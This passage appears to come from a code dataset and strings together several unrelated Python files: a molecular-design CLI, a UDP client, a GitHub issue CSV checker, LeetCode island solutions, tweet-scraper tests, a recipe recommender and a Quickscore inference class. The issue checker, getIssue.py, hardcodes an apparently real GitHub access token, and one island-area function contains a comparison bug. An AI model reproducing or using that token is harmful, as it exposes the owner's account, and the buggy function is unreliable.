isinstance(MainConfig['seed_mol'], list):\n # If the items are path to the pickle objects\n if any([os.path.isfile(path) for path in MainConfig['seed_mol']]):\n seed_pop = set()\n for solution in MainConfig['seed_mol']:\n _, pop = utils.decompress_pickle(solution)\n seed_pop.update(pop)\n # Sort\n seed_pop = sorted(seed_pop)\n # Select the best and get only the RDKit molecule object\n MainConfig['seed_mol'] = [individual.mol for individual in seed_pop[:MainConfig['popsize']]]\n else:\n # Delete repeated SMILES\n MainConfig['seed_mol'] = set(MainConfig['seed_mol'])\n # COnvert to mol\n MainConfig['seed_mol'] = [Chem.MolFromSmiles(smi) for smi in MainConfig['seed_mol']]\n # Filter out invalid molecules\n MainConfig['seed_mol'] = list(filter(None, MainConfig['seed_mol']))\n else: # It will be assumed that it is a valid SMILES string\n MainConfig['seed_mol'] = Chem.MolFromSmiles(MainConfig['seed_mol'])\n\n # Convert if needed constraint_ref\n if 'constraint_ref' in MainConfig['costfunc_kwargs']:\n MainConfig['costfunc_kwargs']['constraint_ref'] = Chem.MolFromMolFile(MainConfig['costfunc_kwargs']['constraint_ref'])\n\n InitArgs = MainConfig.copy()\n\n # Modifying InitArgs\n _ = [InitArgs.pop(key, None) for key in ['type', 'njobs', 'pick']]\n InitArgs['costfunc'] = self.costfunc\n\n # Getting call arguments\n CallArgs = dict()\n for key in ['njobs', 'pick']:\n try:\n CallArgs[key] = MainConfig[key]\n except KeyError:\n pass\n\n # Checking for follow jobs and sanity check on the arguments\n if FollowConfig:\n # Defining the possible mutable 
arguments with its default values depending on the type of run\n if MainConfig['type'].lower() == 'local':\n raise ValueError(\"Type = Local does not accept multiple call from the command line! Remove follow \"\\\n \"jobs from the yaml file (only the main job is possible)\")\n else:\n # Add default value in case it is not provided for keyword arguments\n ga_keywords = {}\n list_of_keywords = [\n 'beta', 'pc', 'get_similar','mutate_crem_kwargs',\n 'save_pop_every_gen', 'checkpoint', 'deffnm',\n ]\n for param in inspect.signature(self.TypeOfRun).parameters.values():\n if (param.kind == param.POSITIONAL_OR_KEYWORD and\n param.default is not param.empty and\n param.name in list_of_keywords and\n param.name not in InitArgs):\n InitArgs[param.name] = param.default\n\n MutableArgs = {\n 'njobs': CallArgs['njobs'],\n 'crem_db_path': InitArgs['crem_db_path'],\n 'maxiter': InitArgs['maxiter'],\n 'popsize': InitArgs['popsize'],\n 'beta': InitArgs['beta'],\n 'pc': InitArgs['pc'],\n 'get_similar': InitArgs['get_similar'],\n # This one it will update with the default values of crem rather thant the previous one.\n 'mutate_crem_kwargs': InitArgs['mutate_crem_kwargs'],\n 'save_pop_every_gen': InitArgs['save_pop_every_gen'],\n 'checkpoint': InitArgs['checkpoint'],\n 'deffnm': InitArgs['deffnm'],\n }\n\n # Sanity check\n for job in FollowConfig:\n for arg in FollowConfig[job]:\n if arg not in MutableArgs:\n raise ValueError(f\"The job: {job} has a non-valid argument \\\"{arg}\\\". \"\\\n f\"For now only the following are accepted: {list(MutableArgs.keys())}\")\n else:\n MutableArgs = None\n\n self.MainConfig = MainConfig\n self.FollowConfig = FollowConfig\n self.InitArgs = InitArgs\n self.CallArgs = CallArgs\n self.MutableArgs = MutableArgs\n\n def _get_continuation_point(self): # this gave me the job and how many generation are needed to complete it.. The further jobs are suppose that must run.\n if self.continuation:\n if self._TypeOfRun_str != 'ga':\n raise RuntimeError('Continuation is only valid for GA runs.')\n # Check what was already done\n total_iter = 0\n pbz2 = None\n for job in self.configuration:\n # El problema es que no estan los archivos entonces hay que modificar total_iter\n if os.path.isfile(f\"{self.configuration[job]['deffnm']}_result.pbz2\"):\n # must be defined maxiter in the configuration file\n total_iter += self.configuration[job]['maxiter']\n # Delete (update) the jobs in self.FollowConfig if they were already done\n if job in self.FollowConfig:\n del self.FollowConfig[job]\n # Stay with the last one\n pbz2 = f\"{self.configuration[job]['deffnm']}_result.pbz2\"\n\n # If there is a continuation file, use this\n if os.path.isfile(\"cpt.pbz2\"):\n pbz2 = 'cpt.pbz2'\n iter_done = utils.decompress_pickle(pbz2).NumGens\n total_iter = 0\n for job in self.configuration:\n total_iter += self.configuration[job]['maxiter']\n if total_iter >= iter_done:\n del self.FollowConfig[job]\n break\n elif pbz2:\n iter_done = utils.decompress_pickle(pbz2).NumGens\n else:\n iter_done = 0\n new_maxiter = total_iter - iter_done\n else:\n # In this case we must start from scratch. 
There are not .pbz2 files in the directory\n pbz2, new_maxiter = None, 0\n\n # Set the attributes\n self.pbz2 = pbz2\n self.new_maxiter = new_maxiter\n\n def _set_init_MolDrugClass(self):\n # Here is where the continuation code is added\n\n # Get if if needed to continue and make the corresponded updates on self.FollowConfig\n self._get_continuation_point()\n\n if self.pbz2:\n self.MolDrugClass = utils.decompress_pickle(self.pbz2)\n self.MolDrugClass.maxiter = self.new_maxiter\n else:\n # Initialize the class from scratch\n self.MolDrugClass = self.TypeOfRun(**self.InitArgs)\n\n def run_MolDrugClass(self):\n self.MolDrugClass(**self.CallArgs)\n\n def save_data(self):\n # Saving data\n if self._TypeOfRun_str == 'local':\n self.MolDrugClass.pickle(\"local_result\", compress=True)\n utils.make_sdf(self.MolDrugClass.pop, sdf_name = \"local_pop\")\n else:\n self.MolDrugClass.pickle(f\"{self.MolDrugClass.deffnm}_result\", compress=True)\n utils.make_sdf(self.MolDrugClass.pop, sdf_name = f\"{self.MolDrugClass.deffnm}_pop\")\n\n def __repr__(self) -> str:\n string = self.args.__repr__().replace('Namespace', self.__class__.__name__)\n if self.continuation:\n string += f\"\\nContinuationPoint(pbz2={self.pbz2}, do_iter={self.new_maxiter})\"\n return string\n\ndef __moldrug_cmd():\n \"\"\"\n This function is only used in as part of the command line interface of MolDrug.\n It makes possible to use MolDrug form the command line. More detail help is available\n from the command line `moldrug -h`.\n\n Raises\n ------\n NotImplementedError\n In case that the type of the calculation differs from Local or GA (currently implementations)\n ValueError\n In case that the user ask for followed jobs and Local is selected.\n ValueError\n In case that a non-mutable or non-defined argument is given by the user on the follow jobs.\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n help='The configuration yaml file',\n dest='yaml_file',\n type=str)\n parser.add_argument('-f', '--fitness',\n help=\"The path to the user-custom fitness module; inside of which the given custom cost function must be implemented. \"\\\n \"See the docs for how to do it properly. E.g. my/awesome/fitness_module.py.\"\\\n \"By default will look in the moldrug.fitness module.\",\n dest='fitness',\n nargs=argparse.OPTIONAL,\n default=None,\n type=str)\n parser.add_argument('-o', '--outdir',\n help=\"The path to where all the files should be written. \"\\\n \"By default the current working directory will be used (where the command line was invoked).\",\n dest='outdir',\n nargs=argparse.OPTIONAL,\n default=None,\n type=str)\n parser.add_argument('-c', '--continue',\n help='To continue the simulation. The MolDrug command must be the same and all the output MolDrug files must be located '\\\n 'in the working directory. 
This option is only compatible with moldrug.utils.GA; otherwise, a RuntimeError will be'\\\n 'raised.',\n action = \"store_true\",\n dest = 'continuation')\n parser.add_argument(\n '-v', '--version',\n action='version',\n version=f\"moldrug: {__version__}\")\n\n UserArgs = CommandLineHelper(parser)\n\n print(\n f\"Started at {datetime.datetime.now().strftime('%c')}\\n\"\n f\"You are using moldrug: {__version__}.\\n\\n\"\\\n f\"{UserArgs}\\n\\n\"\\\n # \"The main job is being executed.\\n\\n\"\\\n )\n\n # Call the class\n UserArgs.run_MolDrugClass()\n # Saving data\n UserArgs.save_data()\n # print('The main job finished!')\n\n # In case that follows jobs were defined\n if UserArgs.FollowConfig:\n MutableArgs = UserArgs.MutableArgs.copy()\n for job in UserArgs.FollowConfig:\n print(f\"The follow job {job} started.\")\n\n # Updating arguments\n MutableArgs.update(UserArgs.FollowConfig[job])\n InitArgs = MutableArgs.copy()\n\n # Changing the attributes values\n for arg in InitArgs:\n setattr(UserArgs.MolDrugClass, arg, InitArgs[arg])\n\n # Call the class again\n UserArgs.run_MolDrugClass()\n # Saving data\n UserArgs.save_data()\n print(f'The job {job} finished!')\n\n # Clean checkpoint on normal end\n try:\n os.remove('cpt.pbz2')\n except Exception:\n pass\n\ndef __constraintconf_cmd():\n \"\"\"\n Command line implementation for :meth:`moldrug.constraintconf.constraintconf`\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n '--pdb',\n help = 'Protein pdb file',\n dest = 'pdb',\n type = str,\n )\n parser.add_argument(\n '--smi',\n help='Input SMILES file name',\n dest = 'smi',\n type = str,\n )\n parser.add_argument(\n '--fix',\n help = 'File with fixed piece of the molecule',\n dest = 'fix',\n type = str,\n )\n parser.add_argument(\n '--out',\n help = 'Output file name',\n dest = 'out',\n type = str,\n )\n parser.add_argument(\n '--max',\n help = 'Maximum number of conformers to generate, by default %(default)s',\n dest = 'max',\n default = 25,\n type = int,\n )\n parser.add_argument(\n '--rms',\n help = 'RMS cutoff, by default %(default)s',\n dest = 'rms',\n default = 0.01,\n type = float,\n )\n parser.add_argument(\n '--bump',\n help = 'Bump cutoff, by default %(default)s',\n dest = 'bump',\n default = 1.5,\n type = float,\n )\n args = parser.parse_args()\n constraintconf.constraintconf(args.pdb, args.smi, args.fix, args.out, args.max, args.rms, args.bump)\n\n\nif __name__ == '__main__':\n pass","repo_name":"ale94mleon/MolDrug","sub_path":"src/moldrug/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"74065003025","text":"# --------------------------------------------------------------------------- #\n# ---------------------- Engenharia de Sistemas - UFMG ---------------------- #\n# ----------------------- DCC023 - Redes de Computadores -------------------- #\n# --------------------- Prof. 
Ítalo Fernando Scota Cunha -------------------- #\n# ---------------- Trabalho Prático III - Servidor de Mensagens ------------- #\n# ----------- Alunos : Humberto Monteiro Fialho (2013430811) ------------ #\n# -------------------- Rafael Carneiro de Castro (2013030210) ------------ #\n# --------------------------------------------------------------------------- #\n\nimport sys\nimport select\nimport socket as sck\n\n\n# main: calling functions to receive inputs\ndef main():\n if len(sys.argv) > 3:\n local_port = int(sys.argv[1])\n server_ip = sys.argv[2]\n server_port = int(sys.argv[3])\n\n socket = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n socket.setsockopt(sck.SOL_SOCKET, sck.SO_REUSEADDR, 1)\n socket.bind(('127.0.0.1', local_port))\n\n while True:\n # select incoming from terminal and socket\n reads, _, _ = select.select([sys.stdin, socket], [], [])\n for read in reads:\n if read == socket:\n # message from server\n data = read.recv(500)\n if data:\n # print the message received\n print(data.decode())\n\n else:\n # message from terminal, send command to server\n message = sys.stdin.readline()\n socket.sendto(message.encode(), (server_ip, server_port))\n\n return\n\n\n# --------------------------------------------------------------------------- #\n# calling main function\nif __name__ == '__main__':\n main()\n","repo_name":"castro150/computers-network","sub_path":"tp3/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39252206865","text":"import requests\r\nimport os\r\nfrom pprint import pprint\r\nimport re\r\nfrom io import StringIO\r\nimport pandas as pd\r\nimport csv\r\nimport numpy as np\r\nfrom collections import Counter\r\n\r\ndef normalize_doi(x):\r\n \"\"\"\r\n Normalizes the DOIs to a URL.\r\n \"\"\"\r\n x = x.strip()\r\n if not x.startswith('http'):\r\n x = f'https://doi.org/{x}'\r\n\r\n return x\r\n\r\n# personal token, change it\r\ntoken = \"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\"\r\n# print(token)\r\n\r\n# file regression\r\nFILE_REGEX = '\\[.*\\]\\((https:\\/\\/github.com\\/bhermann\\/DoR\\/files\\/.*)\\)'\r\n\r\nwith open(\"final_result.csv\", 'w', newline='') as f:\r\n writer = csv.writer(f, delimiter=',')\r\n writer.writerow(['issue_id', 'user', 'link', 'time', 'has_error', 'ready_to_inspect', 'comment'])\r\n\r\n issue_list = [250, 251, 252, 253, 254]\r\n\r\n for i in issue_list:\r\n print(\"current in issue\", i)\r\n query_url = f\"https://api.github.com/repos/bhermann/DoR/issues/{i}/comments\"\r\n params = {\r\n \"state\": \"open\",\r\n }\r\n headers = {'Authorization': f'token {token}'}\r\n r = requests.get(query_url, headers=headers, params=params)\r\n\r\n result = r.json()\r\n\r\n for comment in result:\r\n link = re.findall(FILE_REGEX, comment['body'])\r\n\r\n if len(link) > 0:\r\n # initialize error\r\n has_error = 0\r\n\r\n # initialize process permission\r\n can_process = 1\r\n\r\n # initialize comment\r\n feedback = \"\"\r\n\r\n write_row = [i, comment['user']['login']]\r\n file_url = link[0]\r\n write_row.append(file_url)\r\n\r\n # record comment last update time\r\n update_time = comment['updated_at']\r\n write_row.append(update_time)\r\n\r\n # read csv into a pd DataFrame\r\n r_file = requests.get(file_url)\r\n try:\r\n df = pd.read_csv(\r\n StringIO(r_file.content.decode('latin-1'))\r\n )\r\n except pd.errors.ParserError as err:\r\n print('Parse error in issue ', i)\r\n write_row.append(1)\r\n write_row.append(0)\r\n 
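# has_error=1 and ready_to_inspect=0 flag files that pandas cannot parse; the comment column explains why\r\n                    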
write_row.append(\"Parse error\")\r\n\r\n writer.writerow(write_row)\r\n continue\r\n\r\n # pre-process the columns\r\n df.columns = [x.strip() for x in df.columns]\r\n\r\n # check if github id is filled in every row\r\n try:\r\n if df['gh_id'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty gh_id. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column gh_id. \"\r\n\r\n # check if reusing DOI is filled in every row\r\n try:\r\n if df['paper_doi'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty paper_doi. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column paper_doi. \"\r\n\r\n # check whether a reuse has reused_doi or alt_url\r\n try:\r\n null_reused_doi = df[df['reused_doi'].isnull()].index.tolist()\r\n null_alt_url = df[df['alt_url'].isnull()].index.tolist()\r\n\r\n if len(np.intersect1d(null_reused_doi, null_alt_url)) != 0:\r\n has_error = 1\r\n feedback = feedback + \"Have reuse with empty reused_doi and alt_url. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column reused_doi or alt_url. \"\r\n\r\n # check whether reuse_type is identified\r\n try:\r\n if df['reuse_type'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty reuse_type. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column reuse_type. \"\r\n\r\n # dump rows with no paper_doi (reusing DOI)\r\n try:\r\n df.dropna(axis=0, inplace=True,\r\n subset=['paper_doi'])\r\n except KeyError as err:\r\n print(err)\r\n\r\n # Normalize the DOIs\r\n try:\r\n df['paper_doi'] = [normalize_doi(x) for x in df['paper_doi']]\r\n except KeyError as err:\r\n print('In issue ', i, \", paper_doi has something wrong\")\r\n except AttributeError as err:\r\n print(\"In issue \", i, \", paper_doi has wrong entry\")\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"Paper_doi has unnormal entries. 
\"\r\n\r\n write_row.append(has_error)\r\n write_row.append(can_process)\r\n write_row.append(feedback)\r\n\r\n writer.writerow(write_row)\r\n\r\n","repo_name":"XiaoLing941212/DoR-CSC510","sub_path":"getIssue.py","file_name":"getIssue.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37759294439","text":"class Solution:\n # DFS\n # t: O(m * n)\n # s: O(m * n)\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n ROWS, COLS = len(grid), len(grid[0])\n seen = set()\n\n def dfs(r, c):\n\n if r not in range(ROWS) or c not in range(COLS) or (r, c) in seen or (r, c) != \"1\":\n return 0\n \n seen.add((r, c))\n\n return 1 + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1)\n\n area = 0\n for r in range(ROWS):\n for c in range(COLS):\n area = max(area, dfs(r, c))\n \n return area\n\n \n # t: O(m * n) \n # s: O(m * n)\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n \n if not grid:\n return 0\n \n ROWS, COLS = len(grid), len(grid[0])\n seen = set()\n area = 0\n\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n \n def bfs(r, c):\n # process the current node\n seen.add((r, c))\n queue = collections.deque([(r, c), ])\n area_count = 1\n \n while queue:\n (r, c) = queue.popleft()\n \n # explore neighbors \n for dr, dc in directions:\n new_row, new_col = r + dr, c + dc\n \n if new_row in range(ROWS) and new_col in range(COLS) and grid[new_row][new_col] == 1 and (new_row, new_col) not in seen:\n area_count += 1\n seen.add((new_row, new_col))\n queue.append((new_row, new_col))\n \n return area_count\n \n # Loop over the matrix, start bfs from 1's but only start from not seen ones. \n for r in range(ROWS):\n for c in range(COLS):\n if grid[r][c] == 1 and (r, c) not in seen:\n area = max(area, bfs(r, c))\n \n return area\n\n\n ","repo_name":"ermantatar/Algorithms","sub_path":"Python/8_______GRAPH_______/DFS-BFS/Max_Area_of_Islands.py","file_name":"Max_Area_of_Islands.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"966475119","text":"#!/usr/bin/env python3\n\nfrom urllib import error\n\nimport unittest.mock as mock\nimport pytest\n\n# Package Imports\nimport getalltweets.scraper as ts\nimport getalltweets.criteria as tc\n\n\n@pytest.fixture\ndef criteria():\n\n tweet_crit = tc.TweetCriteria(\n username='zweipunknull',\n query='foo bar',\n number_of_tweets=42,\n language='de'\n )\n\n return tweet_crit\n\ndef test_tweetscraper():\n \"\"\"\n Default Instance\n \"\"\"\n\n tweet_scrap = ts.TweetScraper()\n\n exp_baseurl = 'https://twitter.com/i/search/timeline'\n exp_query = '?f=tweets&q={}&src=typd&{}max_position={}'\n exp_url = exp_baseurl + exp_query\n\n assert(tweet_scrap.baseurl == exp_baseurl )\n assert(tweet_scrap.query == exp_query )\n assert(tweet_scrap.url == exp_url )\n\ndef test_tweetscraper_build_url():\n \"\"\"\n Build URL Function\n \"\"\"\n\n tweet_crit = tc.TweetCriteria()\n tweet_scrap = ts.TweetScraper()\n\n # TODO: Make this a shared resource\n exp_baseurl = 'https://twitter.com/i/search/timeline'\n exp_query = '?f=tweets&q={}&src=typd&{}max_position={}'.format('QUERY', 'TYPD', 'POS')\n exp_url = exp_baseurl + exp_query\n\n assert(True)\n\ndef test_tweetscraper_build_headers():\n \"\"\"\n Build Headers Function\n \"\"\"\n\n exp_headers = [ ('Host', \"twitter.com\"),\n ('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; Win64; x64)\"),\n ('Accept', 
\"application/json, text/javascript, */*; q=0.01\"),\n ('Accept-Language', \"de,en-US;q=0.7,en;q=0.3\"),\n ('X-Requested-With', \"XMLHttpRequest\"),\n ('Referer', 'THE_URL'),\n ('Connection', \"keep-alive\") ]\n\n tweet_scrap = ts.TweetScraper()\n act_headers = tweet_scrap.build_headers('THE_URL')\n\n assert(exp_headers == act_headers)\n\n@mock.patch('urllib.request.build_opener')\n@mock.patch('urllib.request.HTTPCookieProcessor')\ndef test_tweetscraper_scrap(mock_cookie, mock_request, criteria):\n \"\"\"\n Scrap Function\n \"\"\"\n\n mock_opener = mock.MagicMock()\n mock_response = mock.MagicMock()\n\n mock_response.read.return_value = '{}'.encode('utf8')\n mock_opener.open.return_value = mock_response\n\n mock_request.return_value = mock_opener\n\n scraper = ts.TweetScraper()\n\n cookie = 'CookieJar'\n cursor = ''\n\n scraper.scrap(criteria, cursor, cookie)\n\n assert(('Host', 'twitter.com') in mock_opener.addheaders)\n\n mock_cookie.assert_called_once_with('CookieJar')\n mock_request.assert_called_once_with(mock_cookie())\n\n mock_opener.open.assert_called_with('https://twitter.com/i/search/timeline?f=tweets&q=%20from%3Azweipunknull%20foo%20bar&src=typd&lang=de&max_position=')\n\n\n@mock.patch('urllib.request.build_opener')\n@mock.patch('urllib.request.HTTPCookieProcessor')\ndef test_tweetscraper_scrap_error(mock_cookie, mock_request, criteria):\n \"\"\"\n Scrap Function\n \"\"\"\n\n\n mock_opener = mock.MagicMock()\n mock_response = mock.MagicMock()\n\n mock_response.read.return_value = '{}'.encode('utf8')\n mock_opener.open.return_value = mock_response\n mock_opener.open.side_effect = error.HTTPError('url', 1, 'msg', 'hdr', mock.MagicMock())\n\n mock_request.return_value = mock_opener\n\n scraper = ts.TweetScraper()\n\n cookie = 'CookieJar'\n cursor = ''\n\n actual = scraper.scrap(criteria, cursor, cookie)\n\n assert(actual is None)\n","repo_name":"martialblog/getalltweets","sub_path":"tests/test_scraper.py","file_name":"test_scraper.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12440323191","text":"import collections\nimport math\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport gzip\nfrom collections import defaultdict\nimport pandas as pd\nfrom tqdm import tqdm\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef splitDataset(datapath):\n f = gzip.open(datapath, 'rt')\n data = pd.read_csv(f)\n train, valid = data, data[400001:]\n return data, train, valid\n\n\ndata, train, valid = splitDataset(\"data/trainInteractions.csv.gz\")\n\n\n# Task 1\nrecipeCount = defaultdict(int)\ntotalCooked = 0\nfor index, row in tqdm(train.iterrows()):\n recipeCount[row['recipe_id']] += row['rating']\n totalCooked += row['rating']\nmostPopular = [(recipeCount[x], x) for x in recipeCount]\nmostPopular.sort()\nmostPopular.reverse()\n\nrecipeRatingCount = defaultdict(float)\n\n\n#\n#\n#Task 3\n\n\ndef Jaccard(s1, s2):\n numer = len(s1.intersection(s2))\n denom = len(s1.union(s2))\n return numer / denom\n\n\ndef Ochial(s1, s2):\n numer = len(s1.intersection(s2))\n denom = math.sqrt(len(s1) * len(s2))\n return numer/denom\n\n\ndef Simpson(s1, s2):\n numer = len(s1.intersection(s2))\n denom = min(len(s1), len(s2))\n return numer/denom\n\n\ndef Dice(s1, s2):\n numer = len(s1.intersection(s2)) * 2\n denom = len(s1) + len(s2)\n return numer/denom\n\n\nuserRecipe, recipeUser = defaultdict(set), defaultdict(set)\nfor index, row in tqdm(data.iterrows()):\n 
userRecipe[row['user_id']].add(row['recipe_id'])\n recipeUser[row['recipe_id']].add(row['user_id'])\n\n\ndef parse(f):\n for l in open(f, 'r', encoding='utf8'):\n yield eval(l)\n\n\npath = 'data/trainRecipes.json'\ntrain_dataset = list(parse(path))\npath = 'data/testRecipes.json'\ntest_dataset = list(parse(path))\nitemPerRecipe_train, recipePerItem_train = collections.defaultdict(set), collections.defaultdict(set)\nfor d in train_dataset:\n for i in d['ingredients']:\n itemPerRecipe_train[d['recipe_id']].add(i)\n recipePerItem_train[i].add(d['recipe_id'])\n\nitemPerRecipe_test, recipePerItem_test = collections.defaultdict(set), collections.defaultdict(set)\nitem = set()\nfor d in test_dataset:\n for i in d['ingredients']:\n item.add(i)\n itemPerRecipe_test[d['recipe_id']].add(i)\n recipePerItem_test[i].add(d['recipe_id'])\n\n\nreturn1 = set()\ncount = 0\n\nprint(totalCooked*0.6315)\nprint(totalCooked*0.6325)\n\nfor ic, i in mostPopular:\n count += ic\n return1.add(i)\n # if count > totalCooked * 0.6455:\n if count > totalCooked*0.6345:\n break\n#Task 5\npredictions = open(\"kaggle.txt\", 'w')\npredictions.write('user_id-recipe_id,prediction\\n')\nthresohold_up = 0.2\nthresohold_down = -1\ndef ensemble_kaggle():\n for l in tqdm(open(\"data/stub_Made.txt\")):\n u, r = l.strip().split('-')\n if u == 'user_id':\n continue\n userR = userRecipe[int(u)]\n m = 0\n # method 1\n # for recipe in userR:\n # if int(r) not in recipeUser:\n # m = max(0, m)\n # else:\n # # m = max(Jaccard(recipeUser[int(r)], recipeUser[recipe]), m)\n # m = max(Ochial(recipeUser[int(r)], recipeUser[recipe]), m)\n # # m = max(Dice(recipeUser[int(r)], recipeUser[recipe]), m)\n # if m > thresohold_up:\n # break\n\n #method 2\n # us = set()\n # for recipe in userR:\n # if int(r) not in recipeUser:\n # m = max(0, m)\n # else:\n # us = us.union(recipeUser[recipe])\n # m = max(Ochial(recipeUser[int(r)], recipeUser[recipe]), m)\n # if m > thresohold_down:\n # break\n\n # method 3\n\n # ingre_list = itemPerRecipe_test[int(r)]\n # append = set()\n # for i in ingre_list:\n # max_similarity, max_item = -1, ''\n # for it in item:\n # if it in ingre_list:\n # continue\n # sim = Jaccard(recipePerItem_train[it], recipePerItem_train[i])\n # if sim > max_similarity:\n # max_similarity, max_item = sim, it\n # append.add(max_item)\n #\n # for s in append:\n # ingre_list.add(s)\n #\n # for d in tqdm(train_dataset):\n # recipe = set(d['ingredients'])\n # sim = Jaccard(recipe, ingre_list)\n # m = max(sim, m)\n # if m > thresohold:\n # break\n\n if m > thresohold_down and int(r) in return1:\n predictions.write(u + '-' + r + \",1\\n\")\n else:\n predictions.write(u + '-' + r + \",0\\n\")\n\n # acc.append(correct / len(valid))\n return \"finish training\"\n\nprint(ensemble_kaggle())\n# predictions.close()","repo_name":"jalencato/graduate_course","sub_path":"cse258/is_recipe.py","file_name":"is_recipe.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12485278472","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport random\nimport time\nimport sys\nfrom src import util\nimport mpmath as mpm\nmpm.mp.dps = 40\n\n\n# In[93]:\n\n\ndef _powerset(s):\n if len(s) ==0:\n yield s\n else:\n for set in _powerset(s[1:]):\n yield [s[0]]+set\n yield set\n \ndef _powerset_tuple(s):\n if len(s) == 0:\n yield s\n else:\n for set in _powerset_tuple(s[1:]):\n yield (s[0],) + set\n yield set\n\nclass Quickscore:\n\n def 
set_mpm_precision(self, precision):\n mpm.mp.dps = precision\n\n def __init__(self,Q=None,PD=None, onlyupdatepd = False):\n\n self.Q = Q\n self.PD = PD\n self.PD_org = np.array(PD)\n self.inverse_PD = 1-PD if PD is not None else None\n self.onlyUpdatePD = onlyupdatepd\n\n def convert_to_mpf(self):\n mpm_convert = np.vectorize(lambda x: mpm.mpf(x,))\n self.Q = mpm_convert(self.Q)\n self.PD = mpm_convert(self.PD)\n self.inverse_PD = mpm_convert(1-self.PD)\n\n def N_disease(self):\n return self.Q.shape[1]\n \n def N_findings(self):\n return self.Q.shape[0]\n\n def set_Q(self,Q):\n self.Q = Q\n \n def set_PD(self,PD):\n self.PD = PD\n\n def set_inversePD(self, invPD):\n self.inverse_PD = invPD\n \n def set_PD_org(self,PD):\n self.PD_org = PD\n\n def oneMinusPD(self, i):\n if self.onlyUpdatePD:\n return self.inverse_PD[i]\n else:\n return 1-self.PD[i]\n \n def generateRandomTables(self,nd,nf):\n self.PD = np.array([max(random.betavariate(2,20),1e-10) for i in range(nd)])\n self.PD_org = self.PD\n self.inverse_PD = 1-self.PD\n self.Q = np.array([[0 if random.random() > 0.1 else max(0,min(abs(random.gauss(0.03,0.6)),0.9)) for i in range(nd)] for i in range(nf)])\n\n def PNegativeFinding(self,negfinding):\n '''\n The probability that a single finding will be absent\n '''\n res = 1\n #For loop runs in the number of diseases\n for i in range(self.N_disease()):\n int_res = (1-self.Q[negfinding,i])*self.PD[i]+self.oneMinusPD(i)\n res = res*int_res\n return res\n\n\n def PNegativeFindings(self,*findings):\n '''\n The probability that multiple findings will be absent\n '''\n res = 1\n #Outer product\n for i in range(self.N_disease()):\n int_res = 1\n #Inner product\n for finding in findings:\n int_res = (1-self.Q[finding,i]) * int_res\n pdi = self.PD[i]\n not_pdi = self.oneMinusPD(i)\n res = res * (int_res*pdi+not_pdi)\n return res\n\n\n def PPositiveFindings(self,*findings):\n ''' \n The probability that multiple findings will be present\n '''\n findings = list(findings)\n res = 0\n for F in _powerset(findings):\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F:\n inn_prod = inn_prod*(1-self.Q[f,i])\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n return res\n\n def probability_of_findings(self, present_findings, absent_findings, d_i = None):\n ''' \n The probability that a mixture of findings will be present or absent.\n \n If d_i is set the conditional probability of the findings given disease d_i will be returned\n '''\n res = 0\n for F in _powerset(present_findings):\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F+absent_findings:\n inn_prod = inn_prod*(1-self.Q[f,i])\n\n if(i==d_i):\n out_prod = out_prod * inn_prod\n else:\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n return res\n\n def probability_of_findings_opt2(self, present_findings, absent_findings, d_i=None, showStatus = False):\n '''\n Implements equation 11 from paper: The probability that a mixture of findings will be present or absent.\n Only iterates over relevant disease parents.\n '''\n res = 0\n iteration = 0\n for F in _powerset(present_findings):\n sign = (-1) ** len(F)\n out_prod = 1\n for i in util.parents_of_findings(self.Q, F + absent_findings):\n inn_prod = 1\n for f in F + absent_findings:\n inn_prod = inn_prod * (1 - self.Q[f, i])\n\n if (i == d_i):\n out_prod = out_prod * inn_prod\n else:\n out_prod = out_prod * (inn_prod 
